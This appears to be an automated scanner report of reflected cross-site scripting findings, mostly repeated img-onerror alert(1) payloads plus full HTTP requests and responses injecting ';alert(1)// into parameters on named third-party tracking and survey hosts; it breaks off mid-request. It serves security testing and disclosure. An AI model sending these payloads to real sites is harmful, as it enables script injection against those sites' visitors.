The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 343d7<img%20src%3da%20onerror%3dalert(1)>dbbe95a5ea3 was submitted in the REST URL parameter 4. This input was echoed as 343d7<img src=a onerror=alert(1)>dbbe95a5ea3 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eca8c<img%20src%3da%20onerror%3dalert(1)>96263e8f755 was submitted in the REST URL parameter 4. This input was echoed as eca8c<img src=a onerror=alert(1)>96263e8f755 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cbf6a<img%20src%3da%20onerror%3dalert(1)>6cbaf6bbc19 was submitted in the REST URL parameter 4. This input was echoed as cbf6a<img src=a onerror=alert(1)>6cbaf6bbc19 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 53156<img%20src%3da%20onerror%3dalert(1)>1ede4f59a85 was submitted in the REST URL parameter 4. This input was echoed as 53156<img src=a onerror=alert(1)>1ede4f59a85 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d44c8<img%20src%3da%20onerror%3dalert(1)>f4e2e92266 was submitted in the REST URL parameter 4. This input was echoed as d44c8<img src=a onerror=alert(1)>f4e2e92266 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ced2e<img%20src%3da%20onerror%3dalert(1)>50ade7bf351 was submitted in the REST URL parameter 4. This input was echoed as ced2e<img src=a onerror=alert(1)>50ade7bf351 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61996<img%20src%3da%20onerror%3dalert(1)>a6903d9492e was submitted in the REST URL parameter 4. This input was echoed as 61996<img src=a onerror=alert(1)>a6903d9492e in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ebcbd<img%20src%3da%20onerror%3dalert(1)>66693aacae0 was submitted in the REST URL parameter 4. This input was echoed as ebcbd<img src=a onerror=alert(1)>66693aacae0 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e7088<img%20src%3da%20onerror%3dalert(1)>9d68a8ca440 was submitted in the REST URL parameter 4. This input was echoed as e7088<img src=a onerror=alert(1)>9d68a8ca440 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b792c<img%20src%3da%20onerror%3dalert(1)>c708b5b3f36 was submitted in the REST URL parameter 4. This input was echoed as b792c<img src=a onerror=alert(1)>c708b5b3f36 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 30611<img%20src%3da%20onerror%3dalert(1)>09d6acce984 was submitted in the REST URL parameter 4. This input was echoed as 30611<img src=a onerror=alert(1)>09d6acce984 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6107d<img%20src%3da%20onerror%3dalert(1)>e624fee1427 was submitted in the REST URL parameter 4. This input was echoed as 6107d<img src=a onerror=alert(1)>e624fee1427 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3f5bb<img%20src%3da%20onerror%3dalert(1)>a491f4508bc was submitted in the REST URL parameter 4. This input was echoed as 3f5bb<img src=a onerror=alert(1)>a491f4508bc in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7a1c3<img%20src%3da%20onerror%3dalert(1)>6af960c4dea was submitted in the REST URL parameter 4. This input was echoed as 7a1c3<img src=a onerror=alert(1)>6af960c4dea in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a75b5<img%20src%3da%20onerror%3dalert(1)>0581d48490f was submitted in the REST URL parameter 4. This input was echoed as a75b5<img src=a onerror=alert(1)>0581d48490f in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 48a06<img%20src%3da%20onerror%3dalert(1)>08df469c4e0 was submitted in the REST URL parameter 4. This input was echoed as 48a06<img src=a onerror=alert(1)>08df469c4e0 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3c7e2<img%20src%3da%20onerror%3dalert(1)>7e69ac8974 was submitted in the REST URL parameter 4. This input was echoed as 3c7e2<img src=a onerror=alert(1)>7e69ac8974 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aa815<img%20src%3da%20onerror%3dalert(1)>53559da58d7 was submitted in the REST URL parameter 4. This input was echoed as aa815<img src=a onerror=alert(1)>53559da58d7 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e7502<img%20src%3da%20onerror%3dalert(1)>07e6cff3556 was submitted in the REST URL parameter 4. This input was echoed as e7502<img src=a onerror=alert(1)>07e6cff3556 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 65aeb<img%20src%3da%20onerror%3dalert(1)>0fc86ecbee1 was submitted in the REST URL parameter 4. This input was echoed as 65aeb<img src=a onerror=alert(1)>0fc86ecbee1 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 985a8<img%20src%3da%20onerror%3dalert(1)>e780e45a551 was submitted in the REST URL parameter 4. This input was echoed as 985a8<img src=a onerror=alert(1)>e780e45a551 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f6019<img%20src%3da%20onerror%3dalert(1)>b1a0c8122d5 was submitted in the REST URL parameter 4. This input was echoed as f6019<img src=a onerror=alert(1)>b1a0c8122d5 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 77a6a<img%20src%3da%20onerror%3dalert(1)>0e187afc1a3 was submitted in the REST URL parameter 4. This input was echoed as 77a6a<img src=a onerror=alert(1)>0e187afc1a3 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 52c6b<img%20src%3da%20onerror%3dalert(1)>7e246c89ffb was submitted in the REST URL parameter 4. This input was echoed as 52c6b<img src=a onerror=alert(1)>7e246c89ffb in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8c474<img%20src%3da%20onerror%3dalert(1)>6ecf10dfb31 was submitted in the REST URL parameter 4. This input was echoed as 8c474<img src=a onerror=alert(1)>6ecf10dfb31 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 790d9<img%20src%3da%20onerror%3dalert(1)>6d991b1fd4a was submitted in the REST URL parameter 4. This input was echoed as 790d9<img src=a onerror=alert(1)>6d991b1fd4a in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 626be<img%20src%3da%20onerror%3dalert(1)>47c850577d4 was submitted in the REST URL parameter 4. This input was echoed as 626be<img src=a onerror=alert(1)>47c850577d4 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ad2b5<img%20src%3da%20onerror%3dalert(1)>17205cea70a was submitted in the REST URL parameter 4. This input was echoed as ad2b5<img src=a onerror=alert(1)>17205cea70a in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9b2fe<img%20src%3da%20onerror%3dalert(1)>b6120455008 was submitted in the REST URL parameter 4. This input was echoed as 9b2fe<img src=a onerror=alert(1)>b6120455008 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 52787<img%20src%3da%20onerror%3dalert(1)>d1e2b34e36a was submitted in the REST URL parameter 4. This input was echoed as 52787<img src=a onerror=alert(1)>d1e2b34e36a in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bdbd8<img%20src%3da%20onerror%3dalert(1)>91425f070a7 was submitted in the REST URL parameter 4. This input was echoed as bdbd8<img src=a onerror=alert(1)>91425f070a7 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b9971<img%20src%3da%20onerror%3dalert(1)>788fd8aed58 was submitted in the REST URL parameter 4. This input was echoed as b9971<img src=a onerror=alert(1)>788fd8aed58 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7c120<img%20src%3da%20onerror%3dalert(1)>cbc595904a1 was submitted in the REST URL parameter 4. This input was echoed as 7c120<img src=a onerror=alert(1)>cbc595904a1 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8496<img%20src%3da%20onerror%3dalert(1)>8febe2ef8cb was submitted in the REST URL parameter 4. This input was echoed as f8496<img src=a onerror=alert(1)>8febe2ef8cb in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a31a2<img%20src%3da%20onerror%3dalert(1)>2d612f92168 was submitted in the REST URL parameter 4. This input was echoed as a31a2<img src=a onerror=alert(1)>2d612f92168 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8189d<img%20src%3da%20onerror%3dalert(1)>c965a8f7656 was submitted in the REST URL parameter 4. This input was echoed as 8189d<img src=a onerror=alert(1)>c965a8f7656 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a4224<img%20src%3da%20onerror%3dalert(1)>8c9adb198c2 was submitted in the REST URL parameter 4. This input was echoed as a4224<img src=a onerror=alert(1)>8c9adb198c2 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 31850<img%20src%3da%20onerror%3dalert(1)>eae6ae15ce0 was submitted in the REST URL parameter 4. This input was echoed as 31850<img src=a onerror=alert(1)>eae6ae15ce0 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8459<img%20src%3da%20onerror%3dalert(1)>90c27eff998 was submitted in the REST URL parameter 4. This input was echoed as f8459<img src=a onerror=alert(1)>90c27eff998 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cac81<img%20src%3da%20onerror%3dalert(1)>08938a5b728 was submitted in the REST URL parameter 4. This input was echoed as cac81<img src=a onerror=alert(1)>08938a5b728 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 37c75<img%20src%3da%20onerror%3dalert(1)>443dd332700 was submitted in the REST URL parameter 4. This input was echoed as 37c75<img src=a onerror=alert(1)>443dd332700 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e07ae<img%20src%3da%20onerror%3dalert(1)>d9f394bfcc3 was submitted in the REST URL parameter 4. This input was echoed as e07ae<img src=a onerror=alert(1)>d9f394bfcc3 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9d38b<img%20src%3da%20onerror%3dalert(1)>cf31d8f5e51 was submitted in the REST URL parameter 4. This input was echoed as 9d38b<img src=a onerror=alert(1)>cf31d8f5e51 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 87dd2<img%20src%3da%20onerror%3dalert(1)>72dc6b7d378 was submitted in the REST URL parameter 4. This input was echoed as 87dd2<img src=a onerror=alert(1)>72dc6b7d378 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload df4f1<img%20src%3da%20onerror%3dalert(1)>8d0a9d52acf was submitted in the REST URL parameter 4. This input was echoed as df4f1<img src=a onerror=alert(1)>8d0a9d52acf in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8ab4b<img%20src%3da%20onerror%3dalert(1)>20d1e3c8994 was submitted in the REST URL parameter 4. This input was echoed as 8ab4b<img src=a onerror=alert(1)>20d1e3c8994 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 37ae8<img%20src%3da%20onerror%3dalert(1)>e810f7a2cc6 was submitted in the REST URL parameter 4. This input was echoed as 37ae8<img src=a onerror=alert(1)>e810f7a2cc6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 967a2<img%20src%3da%20onerror%3dalert(1)>af29eec5e58 was submitted in the REST URL parameter 4. This input was echoed as 967a2<img src=a onerror=alert(1)>af29eec5e58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ee1b3<img%20src%3da%20onerror%3dalert(1)>4280baca906 was submitted in the REST URL parameter 4. This input was echoed as ee1b3<img src=a onerror=alert(1)>4280baca906 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2d5c2<img%20src%3da%20onerror%3dalert(1)>335dd98f5de was submitted in the REST URL parameter 4. This input was echoed as 2d5c2<img src=a onerror=alert(1)>335dd98f5de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1afb2<img%20src%3da%20onerror%3dalert(1)>f841bf64a1b was submitted in the REST URL parameter 4. This input was echoed as 1afb2<img src=a onerror=alert(1)>f841bf64a1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b205b<img%20src%3da%20onerror%3dalert(1)>68a15209a5 was submitted in the REST URL parameter 4. This input was echoed as b205b<img src=a onerror=alert(1)>68a15209a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 21c83<img%20src%3da%20onerror%3dalert(1)>643d48be1b7 was submitted in the REST URL parameter 4. This input was echoed as 21c83<img src=a onerror=alert(1)>643d48be1b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ec059<img%20src%3da%20onerror%3dalert(1)>917f01586b7 was submitted in the REST URL parameter 4. This input was echoed as ec059<img src=a onerror=alert(1)>917f01586b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6b99a<img%20src%3da%20onerror%3dalert(1)>fa4ea1be793 was submitted in the REST URL parameter 4. This input was echoed as 6b99a<img src=a onerror=alert(1)>fa4ea1be793 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b3975<img%20src%3da%20onerror%3dalert(1)>f5b211b3a20 was submitted in the REST URL parameter 4. This input was echoed as b3975<img src=a onerror=alert(1)>f5b211b3a20 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1300b<img%20src%3da%20onerror%3dalert(1)>f886d0f9184 was submitted in the REST URL parameter 4. This input was echoed as 1300b<img src=a onerror=alert(1)>f886d0f9184 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the cD request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 836eb%3balert(1)//a0516d60980 was submitted in the cD parameter. This input was echoed as 836eb;alert(1)//a0516d60980 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webValidator.aspx?sdfc=e5614d9c-35522-0e3f1f95-2f01-4253-92b6-2beabac31bda&lID=1&loc=4Q-WEB2&cD=90836eb%3balert(1)//a0516d60980&rF=False&iType=1&domainname=0 HTTP/1.1
Host: ips-invite.iperceptions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE04
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Fri, 30 Sep 2011 12:12:15 GMT
Content-Length: 3026
var sID= '35522'; var sC= 'IPE35522';var rF='False'; var brow= 'Chrome'; var vers= '14'; var lID= '1'; var loc= '4Q-WEB2'; var ps='sdfc=e5614d9c-35522-0e3f1f95-2f01-4253-92b6-2beabac31bda&lID=1&loc=4Q ...[SNIP]... etLinkerUrl(url, false); } catch(e){ } return url; }var tC= 'IPEt'; var tCv='?'; CCook(tC,tC,0); tCv= GetC(tC);if (GetC(sC)==null && GetC('IPE_S_35522') == null && tCv != null) {CCook(sC,sC,90836eb;alert(1)//a0516d60980); Ld();} DCook(tC);function CCook(n,v,d){var exp= ''; var dm = document.domain;if (d) {var dt= new Date();dt.setTime(dt.getTime()+(d*24*60*60*1000));exp='; expires='+dt.toGMTString();}document.cookie= ...[SNIP]...
The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1e2a'%3balert(1)//4083be8c2f8 was submitted in the loc parameter. This input was echoed as d1e2a';alert(1)//4083be8c2f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webValidator.aspx?sdfc=e5614d9c-35522-0e3f1f95-2f01-4253-92b6-2beabac31bda&lID=1&loc=4Q-WEB2d1e2a'%3balert(1)//4083be8c2f8&cD=90&rF=False&iType=1&domainname=0 HTTP/1.1
Host: ips-invite.iperceptions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE02
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Fri, 30 Sep 2011 12:11:57 GMT
Content-Length: 3030
var sID= '35522'; var sC= 'IPE35522';var rF='False'; var brow= 'Chrome'; var vers= '14'; var lID= '1'; var loc= '4Q-WEB2d1e2a';alert(1)//4083be8c2f8'; var ps='sdfc=e5614d9c-35522-0e3f1f95-2f01-4253-92b6-2beabac31bda&lID=1&loc=4Q-WEB2d1e2a%27%3balert(1)%2f%2f4083be8c2f8&cD=90&rF=False&iType=1&domainname=0';var IPEspeed = 5;var _invite = 'ips-invite ...[SNIP]...
The value of the hist request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c2ed'%3balert(1)//2185f7adbe6 was submitted in the hist parameter. This input was echoed as 3c2ed';alert(1)//2185f7adbe6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=3c2ed'%3balert(1)//2185f7adbe6&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the lag request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9592'%3balert(1)//4b331517d4 was submitted in the lag parameter. This input was echoed as c9592';alert(1)//4b331517d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=c9592'%3balert(1)//4b331517d4&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... ': val = '0'; break; case 'cpca': val = 'Campaign not provided'; break; case 'kmca': val = 'Campaign not provided'; break; case 'cpag': val = 'c9592';alert(1)//4b331517d4'; break; case 'kmag': val = 'c9592';alert(1)//4b331517d4'; break; case 'kw': val = 'Raw Query not available'; break; case 'kmkw': val = 'Raw Query not a ...[SNIP]...
The value of the las request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e66b'%3balert(1)//0808889a259 was submitted in the las parameter. This input was echoed as 9e66b';alert(1)//0808889a259 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=09e66b'%3balert(1)//0808889a259&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... 5247,;expires=' + kmExt.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:''); kmLat = new Date(); kmLat.setTime(kmLat.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays); document.cookie = 'kmL6633=1|09e66b';alert(1)//0808889a259|Campaign not provided|AdGroup not provided|Keyword not provided|unk|Referrer information not available|Raw Query not available;expires=' + kmLat.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:''); ...[SNIP]...
The value of the lc1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f404'%3balert(1)//66f85e6c9f9 was submitted in the lc1 parameter. This input was echoed as 7f404';alert(1)//66f85e6c9f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-17f404'%3balert(1)//66f85e6c9f9&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... 'unk'; break; case 'kmrq': val = 'Raw Query not available'; break; case 'kmrq': val = 'Raw Query not available'; break; case 'kmc1': val = '1833889000-17f404';alert(1)//66f85e6c9f9'; break; case 'kmc1': val = '1833889000-17f404';alert(1)//66f85e6c9f9'; break; case 'kmc2': val = 'N/A'; break; case 'kmc2': val = 'N/A'; break; c ...[SNIP]...
The value of the lc2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce502'%3balert(1)//1302b0e5ca5 was submitted in the lc2 parameter. This input was echoed as ce502';alert(1)//1302b0e5ca5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=ce502'%3balert(1)//1302b0e5ca5&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... val = 'Raw Query not available'; break; case 'kmc1': val = '1833889000-1'; break; case 'kmc1': val = '1833889000-1'; break; case 'kmc2': val = 'ce502';alert(1)//1302b0e5ca5'; break; case 'kmc2': val = 'ce502';alert(1)//1302b0e5ca5'; break; case 'kmc3': val = 'N/A'; break; case 'kmc3': val = 'N/A'; break; case 'kmc4': ...[SNIP]...
The value of the lc3 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47eca'%3balert(1)//e9854004d58 was submitted in the lc3 parameter. This input was echoed as 47eca';alert(1)//e9854004d58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=47eca'%3balert(1)//e9854004d58&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
